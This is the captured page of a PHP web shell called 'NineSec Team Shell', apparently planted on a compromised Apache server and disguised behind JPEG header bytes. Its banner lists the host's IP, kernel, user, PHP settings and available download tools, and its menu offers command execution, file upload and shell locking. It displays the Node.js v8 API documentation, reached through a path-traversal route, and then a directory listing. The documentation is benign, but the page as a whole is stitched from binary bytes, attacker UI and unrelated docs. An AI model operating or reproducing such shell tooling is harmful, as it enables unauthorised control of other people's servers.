�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.171
Web Server : Apache
System : Linux bob 6.17.4-2-pve #1 SMP PREEMPT_DYNAMIC PMX 6.17.4-2 (2025-12-19T07:49Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /media/../usr/share/javascript/../doc/nodejs/../git/../cpp/../cpp/../php-cgi/../nodejs/api/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //media/../usr/share/javascript/../doc/nodejs/../git/../cpp/../cpp/../php-cgi/../nodejs/api/v8.md
# V8

<!--introduced_in=v4.0.0-->

<!-- source_link=lib/v8.js -->

The `node:v8` module exposes APIs that are specific to the version of [V8][]
built into the Node.js binary. It can be accessed using:

```js
const v8 = require('node:v8');
```

## `v8.cachedDataVersionTag()`

<!-- YAML
added: v8.0.0
-->

* Returns: {integer}

Returns an integer representing a version tag derived from the V8 version,
command-line flags, and detected CPU features. This is useful for determining
whether a [`vm.Script`][] `cachedData` buffer is compatible with this instance
of V8.

```js
console.log(v8.cachedDataVersionTag()); // 3947234607
// The value returned by v8.cachedDataVersionTag() is derived from the V8
// version, command-line flags, and detected CPU features. Test that the value
// does indeed update when flags are toggled.
v8.setFlagsFromString('--allow_natives_syntax');
console.log(v8.cachedDataVersionTag()); // 183726201
```

## `v8.getHeapCodeStatistics()`

<!-- YAML
added: v12.8.0
-->

* Returns: {Object}

Returns an object with the following properties:

* `code_and_metadata_size` {number}
* `bytecode_and_metadata_size` {number}
* `external_script_source_size` {number}

<!-- eslint-skip -->

```js
{
  code_and_metadata_size: 212208,
  bytecode_and_metadata_size: 161368,
  external_script_source_size: 1410794
}
```

## `v8.getHeapSnapshot()`

<!-- YAML
added: v11.13.0
-->

* Returns: {stream.Readable} A Readable Stream containing the V8 heap snapshot

Generates a snapshot of the current V8 heap and returns a Readable
Stream that may be used to read the JSON serialized representation.
This JSON stream format is intended to be used with tools such as
Chrome DevTools. The JSON schema is undocumented and specific to the
V8 engine. Therefore, the schema may change from one version of V8 to the next.

Creating a heap snapshot requires memory about twice the size of the heap at
the time the snapshot is created. This results in the risk of OOM killers
terminating the process.

Generating a snapshot is a synchronous operation which blocks the event loop
for a duration depending on the heap size.

```js
// Print heap snapshot to the console
const v8 = require('node:v8');
const stream = v8.getHeapSnapshot();
stream.pipe(process.stdout);
```

## `v8.getHeapSpaceStatistics()`

<!-- YAML
added: v6.0.0
changes:
  - version: v7.5.0
    pr-url: https://github.com/nodejs/node/pull/10186
    description: Support values exceeding the 32-bit unsigned integer range.
-->

* Returns: {Object\[]}

Returns statistics about the V8 heap spaces, i.e. the segments which make up
the V8 heap. Neither the ordering of heap spaces, nor the availability of a
heap space can be guaranteed as the statistics are provided via the V8
[`GetHeapSpaceStatistics`][] function and may change from one V8 version to the
next.

The value returned is an array of objects containing the following properties:

* `space_name` {string}
* `space_size` {number}
* `space_used_size` {number}
* `space_available_size` {number}
* `physical_space_size` {number}

```json
[
  {
    "space_name": "new_space",
    "space_size": 2063872,
    "space_used_size": 951112,
    "space_available_size": 80824,
    "physical_space_size": 2063872
  },
  {
    "space_name": "old_space",
    "space_size": 3090560,
    "space_used_size": 2493792,
    "space_available_size": 0,
    "physical_space_size": 3090560
  },
  {
    "space_name": "code_space",
    "space_size": 1260160,
    "space_used_size": 644256,
    "space_available_size": 960,
    "physical_space_size": 1260160
  },
  {
    "space_name": "map_space",
    "space_size": 1094160,
    "space_used_size": 201608,
    "space_available_size": 0,
    "physical_space_size": 1094160
  },
  {
    "space_name": "large_object_space",
    "space_size": 0,
    "space_used_size": 0,
    "space_available_size": 1490980608,
    "physical_space_size": 0
  }
]
```

## `v8.getHeapStatistics()`

<!-- YAML
added: v1.0.0
changes:
  - version: v7.5.0
    pr-url: https://github.com/nodejs/node/pull/10186
    description: Support values exceeding the 32-bit unsigned integer range.
  - version: v7.2.0
    pr-url: https://github.com/nodejs/node/pull/8610
    description: Added `malloced_memory`, `peak_malloced_memory`,
                 and `does_zap_garbage`.
-->

* Returns: {Object}

Returns an object with the following properties:

* `total_heap_size` {number}
* `total_heap_size_executable` {number}
* `total_physical_size` {number}
* `total_available_size` {number}
* `used_heap_size` {number}
* `heap_size_limit` {number}
* `malloced_memory` {number}
* `peak_malloced_memory` {number}
* `does_zap_garbage` {number}
* `number_of_native_contexts` {number}
* `number_of_detached_contexts` {number}
* `total_global_handles_size` {number}
* `used_global_handles_size` {number}
* `external_memory` {number}

`does_zap_garbage` is a 0/1 boolean, which signifies whether the
`--zap_code_space` option is enabled or not. This makes V8 overwrite heap
garbage with a bit pattern. The RSS footprint (resident set size) gets bigger
because it continuously touches all heap pages and that makes them less likely
to get swapped out by the operating system.

`number_of_native_contexts` The value of native\_context is the number of the
top-level contexts currently active. Increase of this number over time indicates
a memory leak.

`number_of_detached_contexts` The value of detached\_context is the number
of contexts that were detached and not yet garbage collected. This number
being non-zero indicates a potential memory leak.

`total_global_handles_size` The value of total\_global\_handles\_size is the
total memory size of V8 global handles.

`used_global_handles_size` The value of used\_global\_handles\_size is the
used memory size of V8 global handles.

`external_memory` The value of external\_memory is the memory size of array
buffers and external strings.

<!-- eslint-skip -->

```js
{
  total_heap_size: 7326976,
  total_heap_size_executable: 4194304,
  total_physical_size: 7326976,
  total_available_size: 1152656,
  used_heap_size: 3476208,
  heap_size_limit: 1535115264,
  malloced_memory: 16384,
  peak_malloced_memory: 1127496,
  does_zap_garbage: 0,
  number_of_native_contexts: 1,
  number_of_detached_contexts: 0,
  total_global_handles_size: 8192,
  used_global_handles_size: 3296,
  external_memory: 318824
}
```

## `v8.setFlagsFromString(flags)`

<!-- YAML
added: v1.0.0
-->

* `flags` {string}

The `v8.setFlagsFromString()` method can be used to programmatically set
V8 command-line flags. This method should be used with care. Changing settings
after the VM has started may result in unpredictable behavior, including
crashes and data loss; or it may simply do nothing.

The V8 options available for a version of Node.js may be determined by running
`node --v8-options`.

Usage:

```js
// Print GC events to stdout for one minute.
const v8 = require('node:v8');
v8.setFlagsFromString('--trace_gc');
setTimeout(() => { v8.setFlagsFromString('--notrace_gc'); }, 60e3);
```

## `v8.stopCoverage()`

<!-- YAML
added:
  - v15.1.0
  - v12.22.0
-->

The `v8.stopCoverage()` method allows the user to stop the coverage collection
started by [`NODE_V8_COVERAGE`][], so that V8 can release the execution count
records and optimize code. This can be used in conjunction with
[`v8.takeCoverage()`][] if the user wants to collect the coverage on demand.

## `v8.takeCoverage()`

<!-- YAML
added:
  - v15.1.0
  - v12.22.0
-->

The `v8.takeCoverage()` method allows the user to write the coverage started by
[`NODE_V8_COVERAGE`][] to disk on demand. This method can be invoked multiple
times during the lifetime of the process. Each time the execution counter will
be reset and a new coverage report will be written to the directory specified
by [`NODE_V8_COVERAGE`][].

When the process is about to exit, one last coverage will still be written to
disk unless [`v8.stopCoverage()`][] is invoked before the process exits.

## `v8.writeHeapSnapshot([filename])`

<!-- YAML
added: v11.13.0
-->

* `filename` {string} The file path where the V8 heap snapshot is to be
  saved. If not specified, a file name with the pattern
  `'Heap-${yyyymmdd}-${hhmmss}-${pid}-${thread_id}.heapsnapshot'` will be
  generated, where `{pid}` will be the PID of the Node.js process,
  `{thread_id}` will be `0` when `writeHeapSnapshot()` is called from
  the main Node.js thread or the id of a worker thread.
* Returns: {string} The filename where the snapshot was saved.

Generates a snapshot of the current V8 heap and writes it to a JSON
file. This file is intended to be used with tools such as Chrome
DevTools. The JSON schema is undocumented and specific to the V8
engine, and may change from one version of V8 to the next.

A heap snapshot is specific to a single V8 isolate. When using
[worker threads][], a heap snapshot generated from the main thread will
not contain any information about the workers, and vice versa.

Creating a heap snapshot requires memory about twice the size of the heap at
the time the snapshot is created. This results in the risk of OOM killers
terminating the process.

Generating a snapshot is a synchronous operation which blocks the event loop
for a duration depending on the heap size.

```js
const { writeHeapSnapshot } = require('node:v8');
const {
  Worker,
  isMainThread,
  parentPort
} = require('node:worker_threads');

if (isMainThread) {
  const worker = new Worker(__filename);

  worker.once('message', (filename) => {
    console.log(`worker heapdump: ${filename}`);
    // Now get a heapdump for the main thread.
    console.log(`main thread heapdump: ${writeHeapSnapshot()}`);
  });

  // Tell the worker to create a heapdump.
  worker.postMessage('heapdump');
} else {
  parentPort.once('message', (message) => {
    if (message === 'heapdump') {
      // Generate a heapdump for the worker
      // and return the filename to the parent.
      parentPort.postMessage(writeHeapSnapshot());
    }
  });
}
```

## `v8.setHeapSnapshotNearHeapLimit(limit)`

<!-- YAML
added: v16.18.0
-->

> Stability: 1 - Experimental

* `limit` {integer}

The API is a no-op if `--heapsnapshot-near-heap-limit` is already set from the
command line or the API is called more than once. `limit` must be a positive
integer. See [`--heapsnapshot-near-heap-limit`][] for more information.

## Serialization API

The serialization API provides means of serializing JavaScript values in a way
that is compatible with the [HTML structured clone algorithm][].

The format is backward-compatible (i.e. safe to store to disk).
Equal JavaScript values may result in different serialized output.

### `v8.serialize(value)`

<!-- YAML
added: v8.0.0
-->

* `value` {any}
* Returns: {Buffer}

Uses a [`DefaultSerializer`][] to serialize `value` into a buffer.

[`ERR_BUFFER_TOO_LARGE`][] will be thrown when trying to
serialize a huge object which requires buffer
larger than [`buffer.constants.MAX_LENGTH`][].

### `v8.deserialize(buffer)`

<!-- YAML
added: v8.0.0
-->

* `buffer` {Buffer|TypedArray|DataView} A buffer returned by [`serialize()`][].

Uses a [`DefaultDeserializer`][] with default options to read a JS value
from a buffer.

### Class: `v8.Serializer`

<!-- YAML
added: v8.0.0
-->

#### `new Serializer()`

Creates a new `Serializer` object.

#### `serializer.writeHeader()`

Writes out a header, which includes the serialization format version.

#### `serializer.writeValue(value)`

* `value` {any}

Serializes a JavaScript value and adds the serialized representation to the
internal buffer.

This throws an error if `value` cannot be serialized.

#### `serializer.releaseBuffer()`

* Returns: {Buffer}

Returns the stored internal buffer. This serializer should not be used once
the buffer is released. Calling this method results in undefined behavior
if a previous write has failed.

#### `serializer.transferArrayBuffer(id, arrayBuffer)`

* `id` {integer} A 32-bit unsigned integer.
* `arrayBuffer` {ArrayBuffer} An `ArrayBuffer` instance.

Marks an `ArrayBuffer` as having its contents transferred out of band.
Pass the corresponding `ArrayBuffer` in the deserializing context to
[`deserializer.transferArrayBuffer()`][].

#### `serializer.writeUint32(value)`

* `value` {integer}

Write a raw 32-bit unsigned integer.
For use inside of a custom [`serializer._writeHostObject()`][].

#### `serializer.writeUint64(hi, lo)`

* `hi` {integer}
* `lo` {integer}

Write a raw 64-bit unsigned integer, split into high and low 32-bit parts.
For use inside of a custom [`serializer._writeHostObject()`][].

#### `serializer.writeDouble(value)`

* `value` {number}

Write a JS `number` value.
For use inside of a custom [`serializer._writeHostObject()`][].

#### `serializer.writeRawBytes(buffer)`

* `buffer` {Buffer|TypedArray|DataView}

Write raw bytes into the serializer's internal buffer. The deserializer
will require a way to compute the length of the buffer.
For use inside of a custom [`serializer._writeHostObject()`][].

#### `serializer._writeHostObject(object)`

* `object` {Object}

This method is called to write some kind of host object, i.e. an object created
by native C++ bindings. If it is not possible to serialize `object`, a suitable
exception should be thrown.

This method is not present on the `Serializer` class itself but can be provided
by subclasses.

#### `serializer._getDataCloneError(message)`

* `message` {string}

This method is called to generate error objects that will be thrown when an
object can not be cloned.

This method defaults to the [`Error`][] constructor and can be overridden on
subclasses.

#### `serializer._getSharedArrayBufferId(sharedArrayBuffer)`

* `sharedArrayBuffer` {SharedArrayBuffer}

This method is called when the serializer is going to serialize a
`SharedArrayBuffer` object. It must return an unsigned 32-bit integer ID for
the object, using the same ID if this `SharedArrayBuffer` has already been
serialized. When deserializing, this ID will be passed to
[`deserializer.transferArrayBuffer()`][].

If the object cannot be serialized, an exception should be thrown.

This method is not present on the `Serializer` class itself but can be provided
by subclasses.

#### `serializer._setTreatArrayBufferViewsAsHostObjects(flag)`

* `flag` {boolean} **Default:** `false`

Indicate whether to treat `TypedArray` and `DataView` objects as
host objects, i.e. pass them to [`serializer._writeHostObject()`][].

### Class: `v8.Deserializer`

<!-- YAML
added: v8.0.0
-->

#### `new Deserializer(buffer)`

* `buffer` {Buffer|TypedArray|DataView} A buffer returned by
  [`serializer.releaseBuffer()`][].

Creates a new `Deserializer` object.

#### `deserializer.readHeader()`

Reads and validates a header (including the format version).
May, for example, reject an invalid or unsupported wire format. In that case,
an `Error` is thrown.

#### `deserializer.readValue()`

Deserializes a JavaScript value from the buffer and returns it.

#### `deserializer.transferArrayBuffer(id, arrayBuffer)`

* `id` {integer} A 32-bit unsigned integer.
* `arrayBuffer` {ArrayBuffer|SharedArrayBuffer} An `ArrayBuffer` instance.

Marks an `ArrayBuffer` as having its contents transferred out of band.
Pass the corresponding `ArrayBuffer` in the serializing context to
[`serializer.transferArrayBuffer()`][] (or return the `id` from
[`serializer._getSharedArrayBufferId()`][] in the case of `SharedArrayBuffer`s).

#### `deserializer.getWireFormatVersion()`

* Returns: {integer}

Reads the underlying wire format version. Likely mostly to be useful to
legacy code reading old wire format versions. May not be called before
`.readHeader()`.

#### `deserializer.readUint32()`

* Returns: {integer}

Read a raw 32-bit unsigned integer and return it.
For use inside of a custom [`deserializer._readHostObject()`][].

#### `deserializer.readUint64()`

* Returns: {integer\[]}

Read a raw 64-bit unsigned integer and return it as an array `[hi, lo]`
with two 32-bit unsigned integer entries.
For use inside of a custom [`deserializer._readHostObject()`][].

#### `deserializer.readDouble()`

* Returns: {number}

Read a JS `number` value.
For use inside of a custom [`deserializer._readHostObject()`][].

#### `deserializer.readRawBytes(length)`

* `length` {integer}
* Returns: {Buffer}

Read raw bytes from the deserializer's internal buffer. The `length` parameter
must correspond to the length of the buffer that was passed to
[`serializer.writeRawBytes()`][].
For use inside of a custom [`deserializer._readHostObject()`][].

#### `deserializer._readHostObject()`

This method is called to read some kind of host object, i.e. an object that is
created by native C++ bindings. If it is not possible to deserialize the data,
a suitable exception should be thrown.

This method is not present on the `Deserializer` class itself but can be
provided by subclasses.

### Class: `v8.DefaultSerializer`

<!-- YAML
added: v8.0.0
-->

A subclass of [`Serializer`][] that serializes `TypedArray`
(in particular [`Buffer`][]) and `DataView` objects as host objects, and only
stores the part of their underlying `ArrayBuffer`s that they are referring to.

### Class: `v8.DefaultDeserializer`

<!-- YAML
added: v8.0.0
-->

A subclass of [`Deserializer`][] corresponding to the format written by
[`DefaultSerializer`][].

## Promise hooks

The `promiseHooks` interface can be used to track promise lifecycle events.
To track _all_ async activity, see [`async_hooks`][] which internally uses this
module to produce promise lifecycle events in addition to events for other
async resources. For request context management, see [`AsyncLocalStorage`][].

```mjs
import { promiseHooks } from 'node:v8';

// There are four lifecycle events produced by promises:

// The `init` event represents the creation of a promise. This could be a
// direct creation such as with `new Promise(...)` or a continuation such
// as `then()` or `catch()`. It also happens whenever an async function is
// called or does an `await`. If a continuation promise is created, the
// `parent` will be the promise it is a continuation from.
function init(promise, parent) {
  console.log('a promise was created', { promise, parent });
}

// The `settled` event happens when a promise receives a resolution or
// rejection value. This may happen synchronously such as when using
// `Promise.resolve()` on non-promise input.
function settled(promise) {
  console.log('a promise resolved or rejected', { promise });
}

// The `before` event runs immediately before a `then()` or `catch()` handler
// runs or an `await` resumes execution.
function before(promise) {
  console.log('a promise is about to call a then handler', { promise });
}

// The `after` event runs immediately after a `then()` handler runs or when
// an `await` begins after resuming from another.
function after(promise) {
  console.log('a promise is done calling a then handler', { promise });
}

// Lifecycle hooks may be started and stopped individually
const stopWatchingInits = promiseHooks.onInit(init);
const stopWatchingSettleds = promiseHooks.onSettled(settled);
const stopWatchingBefores = promiseHooks.onBefore(before);
const stopWatchingAfters = promiseHooks.onAfter(after);

// Or they may be started and stopped in groups
const stopHookSet = promiseHooks.createHook({
  init,
  settled,
  before,
  after
});

// To stop a hook, call the function returned at its creation.
stopWatchingInits();
stopWatchingSettleds();
stopWatchingBefores();
stopWatchingAfters();
stopHookSet();
```

### `promiseHooks.onInit(init)`

<!-- YAML
added: v16.14.0
-->

* `init` {Function} The [`init` callback][] to call when a promise is created.
* Returns: {Function} Call to stop the hook.

**The `init` hook must be a plain function. Providing an async function will
throw as it would produce an infinite microtask loop.**

```mjs
import { promiseHooks } from 'node:v8';

const stop = promiseHooks.onInit((promise, parent) => {});
```

```cjs
const { promiseHooks } = require('node:v8');

const stop = promiseHooks.onInit((promise, parent) => {});
```

### `promiseHooks.onSettled(settled)`

<!-- YAML
added: v16.14.0
-->

* `settled` {Function} The [`settled` callback][] to call when a promise
  is resolved or rejected.
* Returns: {Function} Call to stop the hook.

**The `settled` hook must be a plain function. Providing an async function will
throw as it would produce an infinite microtask loop.**

```mjs
import { promiseHooks } from 'node:v8';

const stop = promiseHooks.onSettled((promise) => {});
```

```cjs
const { promiseHooks } = require('node:v8');

const stop = promiseHooks.onSettled((promise) => {});
```

### `promiseHooks.onBefore(before)`

<!-- YAML
added: v16.14.0
-->

* `before` {Function} The [`before` callback][] to call before a promise
  continuation executes.
* Returns: {Function} Call to stop the hook.

**The `before` hook must be a plain function. Providing an async function will
throw as it would produce an infinite microtask loop.**

```mjs
import { promiseHooks } from 'node:v8';

const stop = promiseHooks.onBefore((promise) => {});
```

```cjs
const { promiseHooks } = require('node:v8');

const stop = promiseHooks.onBefore((promise) => {});
```

### `promiseHooks.onAfter(after)`

<!-- YAML
added: v16.14.0
-->

* `after` {Function} The [`after` callback][] to call after a promise
  continuation executes.
* Returns: {Function} Call to stop the hook.

**The `after` hook must be a plain function. Providing an async function will
throw as it would produce an infinite microtask loop.**

```mjs
import { promiseHooks } from 'node:v8';

const stop = promiseHooks.onAfter((promise) => {});
```

```cjs
const { promiseHooks } = require('node:v8');

const stop = promiseHooks.onAfter((promise) => {});
```

### `promiseHooks.createHook(callbacks)`

<!-- YAML
added: v16.14.0
-->

* `callbacks` {Object} The [Hook Callbacks][] to register
  * `init` {Function} The [`init` callback][].
  * `before` {Function} The [`before` callback][].
  * `after` {Function} The [`after` callback][].
  * `settled` {Function} The [`settled` callback][].
* Returns: {Function} Used for disabling hooks

**The hook callbacks must be plain functions. Providing async functions will
throw as it would produce an infinite microtask loop.**

Registers functions to be called for different lifetime events of each promise.

The callbacks `init()`/`before()`/`after()`/`settled()` are called for the
respective events during a promise's lifetime.

All callbacks are optional. For example, if only promise creation needs to
be tracked, then only the `init` callback needs to be passed. The
specifics of all functions that can be passed to `callbacks` is in the
[Hook Callbacks][] section.

```mjs
import { promiseHooks } from 'node:v8';

const stopAll = promiseHooks.createHook({
  init(promise, parent) {}
});
```

```cjs
const { promiseHooks } = require('node:v8');

const stopAll = promiseHooks.createHook({
  init(promise, parent) {}
});
```

### Hook callbacks

Key events in the lifetime of a promise have been categorized into four areas:
creation of a promise, before/after a continuation handler is called or around
an await, and when the promise resolves or rejects.

While these hooks are similar to those of [`async_hooks`][] they lack a
`destroy` hook. Other types of async resources typically represent sockets or
file descriptors which have a distinct "closed" state to express the `destroy`
lifecycle event while promises remain usable for as long as code can still
reach them. Garbage collection tracking is used to make promises fit into the
`async_hooks` event model, however this tracking is very expensive and they may
not necessarily ever even be garbage collected.

Because promises are asynchronous resources whose lifecycle is tracked
via the promise hooks mechanism, the `init()`, `before()`, `after()`, and
`settled()` callbacks _must not_ be async functions as they create more
promises which would produce an infinite loop.

While this API is used to feed promise events into [`async_hooks`][], the
ordering between the two is undefined. Both APIs are multi-tenant
and therefore could produce events in any order relative to each other.

#### `init(promise, parent)`

* `promise` {Promise} The promise being created.
* `parent` {Promise} The promise continued from, if applicable.

Called when a promise is constructed. This _does not_ mean that corresponding
`before`/`after` events will occur, only that the possibility exists. This will
happen if a promise is created without ever getting a continuation.

#### `before(promise)`

* `promise` {Promise}

Called before a promise continuation executes. This can be in the form of
`then()`, `catch()`, or `finally()` handlers or an `await` resuming.

The `before` callback will be called 0 to N times. The `before` callback
will typically be called 0 times if no continuation was ever made for the
promise. The `before` callback may be called many times in the case where
many continuations have been made from the same promise.

#### `after(promise)`

* `promise` {Promise}

Called immediately after a promise continuation executes. This may be after a
`then()`, `catch()`, or `finally()` handler or before an `await` after another
`await`.

#### `settled(promise)`

* `promise` {Promise}

Called when the promise receives a resolution or rejection value. This may
occur synchronously in the case of `Promise.resolve()` or `Promise.reject()`.

## Startup Snapshot API

<!-- YAML
added: v16.17.0
-->

> Stability: 1 - Experimental

The `v8.startupSnapshot` interface can be used to add serialization and
deserialization hooks for custom startup snapshots. Currently the startup
snapshots can only be built into the Node.js binary from source.

```console
$ cd /path/to/node
$ ./configure --node-snapshot-main=entry.js
$ make node
# This binary contains the result of the execution of entry.js
$ out/Release/node
```

In the example above, `entry.js` can use methods from the `v8.startupSnapshot`
interface to specify how to save information for custom objects in the snapshot
during serialization and how the information can be used to synchronize these
objects during deserialization of the snapshot. For example, if the `entry.js`
contains the following script:

```cjs
'use strict';

const fs = require('fs');
const zlib = require('zlib');
const path = require('path');
const assert = require('assert');

const {
  isBuildingSnapshot,
  addSerializeCallback,
  addDeserializeCallback,
  setDeserializeMainFunction
} = require('v8').startupSnapshot;

const filePath = path.resolve(__dirname, '../x1024.txt');
const storage = {};

assert(isBuildingSnapshot());

addSerializeCallback(({ filePath }) => {
  storage[filePath] = zlib.gzipSync(fs.readFileSync(filePath));
}, { filePath });

addDeserializeCallback(({ filePath }) => {
  storage[filePath] = zlib.gunzipSync(storage[filePath]);
}, { filePath });

setDeserializeMainFunction(({ filePath }) => {
  console.log(storage[filePath].toString());
}, { filePath });
```

The resulted binary will simply print the data deserialized from the snapshot
during start up:

```console
$ out/Release/node
# Prints content of ./test/fixtures/x1024.txt
```

Currently the API is only available to a Node.js instance launched from the
default snapshot, that is, the application deserialized from a user-land
snapshot cannot use these APIs again.

### `v8.startupSnapshot.addSerializeCallback(callback[, data])`

<!-- YAML
added: v16.17.0
-->

* `callback` {Function} Callback to be invoked before serialization.
* `data` {any} Optional data that will be passed to the `callback` when it
  gets called.

Add a callback that will be called when the Node.js instance is about to
get serialized into a snapshot and exit. This can be used to release
resources that should not or cannot be serialized or to convert user data
into a form more suitable for serialization.

### `v8.startupSnapshot.addDeserializeCallback(callback[, data])`

<!-- YAML
added: v16.17.0
-->

* `callback` {Function} Callback to be invoked after the snapshot is
  deserialized.
* `data` {any} Optional data that will be passed to the `callback` when it
  gets called.

Add a callback that will be called when the Node.js instance is deserialized
from a snapshot. The `callback` and the `data` (if provided) will be
serialized into the snapshot, they can be used to re-initialize the state
of the application or to re-acquire resources that the application needs
when the application is restarted from the snapshot.

### `v8.startupSnapshot.setDeserializeMainFunction(callback[, data])`

<!-- YAML
added: v16.17.0
-->

* `callback` {Function} Callback to be invoked as the entry point after the
  snapshot is deserialized.
* `data` {any} Optional data that will be passed to the `callback` when it
  gets called.

This sets the entry point of the Node.js application when it is deserialized
from a snapshot. This can be called only once in the snapshot building
script. If called, the deserialized application no longer needs an additional
entry point script to start up and will simply invoke the callback along with
the deserialized data (if provided), otherwise an entry point script still
needs to be provided to the deserialized application.

### `v8.startupSnapshot.isBuildingSnapshot()`

<!-- YAML
added: v16.17.0
-->

* Returns: {boolean}

Returns true if the Node.js instance is run to build a snapshot.

[HTML structured clone algorithm]: https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Structured_clone_algorithm
[Hook Callbacks]: #hook-callbacks
[V8]: https://developers.google.com/v8/
[`--heapsnapshot-near-heap-limit`]: cli.md#--heapsnapshot-near-heap-limitmax_count
[`AsyncLocalStorage`]: async_context.md#class-asynclocalstorage
[`Buffer`]: buffer.md
[`DefaultDeserializer`]: #class-v8defaultdeserializer
[`DefaultSerializer`]: #class-v8defaultserializer
[`Deserializer`]: #class-v8deserializer
[`ERR_BUFFER_TOO_LARGE`]: errors.md#err_buffer_too_large
[`Error`]: errors.md#class-error
[`GetHeapSpaceStatistics`]: https://v8docs.nodesource.com/node-13.2/d5/dda/classv8_1_1_isolate.html#ac673576f24fdc7a33378f8f57e1d13a4
[`NODE_V8_COVERAGE`]: cli.md#node_v8_coveragedir
[`Serializer`]: #class-v8serializer
[`after` callback]: #afterpromise
[`async_hooks`]: async_hooks.md
[`before` callback]: #beforepromise
[`buffer.constants.MAX_LENGTH`]: buffer.md#bufferconstantsmax_length
[`deserializer._readHostObject()`]: #deserializer_readhostobject
[`deserializer.transferArrayBuffer()`]: #deserializertransferarraybufferid-arraybuffer
[`init` callback]: #initpromise-parent
[`serialize()`]: #v8serializevalue
[`serializer._getSharedArrayBufferId()`]: #serializer_getsharedarraybufferidsharedarraybuffer
[`serializer._writeHostObject()`]: #serializer_writehostobjectobject
[`serializer.releaseBuffer()`]: #serializerreleasebuffer
[`serializer.transferArrayBuffer()`]: #serializertransferarraybufferid-arraybuffer
[`serializer.writeRawBytes()`]: #serializerwriterawbytesbuffer
[`settled` callback]: #settledpromise
[`v8.stopCoverage()`]: #v8stopcoverage
[`v8.takeCoverage()`]: #v8takecoverage
[`vm.Script`]: vm.md#new-vmscriptcode-options
[worker threads]: worker_threads.md

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
October 23 2023 6:29:41
root
0755
assets
--
October 23 2023 6:29:41
root
0755
addons.html
103.732 KB
August 09 2023 12:32:55
root
0644
addons.json.gz
10.921 KB
August 09 2023 12:32:55
root
0644
addons.md
39.649 KB
August 09 2023 12:32:55
root
0644
all.html
6.72 MB
August 09 2023 12:32:55
root
0644
all.json.gz
839.889 KB
August 09 2023 12:32:55
root
0644
assert.html
188.064 KB
August 09 2023 12:32:55
root
0644
assert.json.gz
12.917 KB
August 09 2023 12:32:55
root
0644
assert.md
65.666 KB
August 09 2023 12:32:55
root
0644
async_context.html
78.018 KB
August 09 2023 12:32:55
root
0644
async_context.json.gz
6.719 KB
August 09 2023 12:32:55
root
0644
async_context.md
22.997 KB
August 09 2023 12:32:55
root
0644
async_hooks.html
80.186 KB
August 09 2023 12:32:55
root
0644
async_hooks.json.gz
9.531 KB
August 09 2023 12:32:55
root
0644
async_hooks.md
28.223 KB
August 09 2023 12:32:55
root
0644
buffer.html
462.769 KB
August 09 2023 12:32:55
root
0644
buffer.json.gz
27.512 KB
August 09 2023 12:32:55
root
0644
buffer.md
145.345 KB
August 09 2023 12:32:55
root
0644
child_process.html
166.773 KB
August 09 2023 12:32:55
root
0644
child_process.json.gz
20.828 KB
August 09 2023 12:32:55
root
0644
child_process.md
70.11 KB
August 09 2023 12:32:55
root
0644
cli.html
140.843 KB
August 09 2023 12:32:55
root
0644
cli.json.gz
21.876 KB
August 09 2023 12:32:55
root
0644
cli.md
57.601 KB
August 09 2023 12:32:55
root
0644
cluster.html
89.359 KB
August 09 2023 12:32:55
root
0644
cluster.json.gz
9.523 KB
August 09 2023 12:32:55
root
0644
cluster.md
28.754 KB
August 09 2023 12:32:55
root
0644
console.html
58.51 KB
August 09 2023 12:32:55
root
0644
console.json.gz
6.067 KB
August 09 2023 12:32:55
root
0644
console.md
16.495 KB
August 09 2023 12:32:55
root
0644
corepack.html
21.889 KB
August 09 2023 12:32:55
root
0644
corepack.json.gz
2.512 KB
August 09 2023 12:32:55
root
0644
corepack.md
4.951 KB
August 09 2023 12:32:55
root
0644
crypto.html
515.748 KB
August 09 2023 12:32:55
root
0644
crypto.json.gz
44.629 KB
August 09 2023 12:32:55
root
0644
crypto.md
189.668 KB
August 09 2023 12:32:55
root
0644
debugger.html
27.063 KB
August 09 2023 12:32:55
root
0644
debugger.json.gz
2.979 KB
August 09 2023 12:32:55
root
0644
debugger.md
6.509 KB
August 09 2023 12:32:55
root
0644
deprecations.html
191.997 KB
August 09 2023 12:32:55
root
0644
deprecations.json.gz
22.844 KB
August 09 2023 12:32:55
root
0644
deprecations.md
93.906 KB
August 09 2023 12:32:55
root
0644
dgram.html
88.111 KB
August 09 2023 12:32:55
root
0644
dgram.json.gz
9.951 KB
August 09 2023 12:32:55
root
0644
dgram.md
30.256 KB
August 09 2023 12:32:55
root
0644
diagnostics_channel.html
44.865 KB
August 09 2023 12:32:55
root
0644
diagnostics_channel.json.gz
3.183 KB
August 09 2023 12:32:55
root
0644
diagnostics_channel.md
10.99 KB
August 09 2023 12:32:55
root
0644
dns.html
122.021 KB
August 09 2023 12:32:55
root
0644
dns.json.gz
15.265 KB
August 09 2023 12:32:55
root
0644
dns.md
47.228 KB
August 09 2023 12:32:55
root
0644
documentation.html
24.487 KB
August 09 2023 12:32:55
root
0644
documentation.json.gz
2.1 KB
August 09 2023 12:32:55
root
0644
documentation.md
4.471 KB
August 09 2023 12:32:55
root
0644
domain.html
47.881 KB
August 09 2023 12:32:55
root
0644
domain.json.gz
6.203 KB
August 09 2023 12:32:55
root
0644
domain.md
15.205 KB
August 09 2023 12:32:55
root
0644
embedding.html
25.116 KB
August 09 2023 12:32:55
root
0644
embedding.json.gz
2.931 KB
August 09 2023 12:32:55
root
0644
embedding.md
6.466 KB
August 09 2023 12:32:55
root
0644
errors.html
275.354 KB
August 09 2023 12:32:55
root
0644
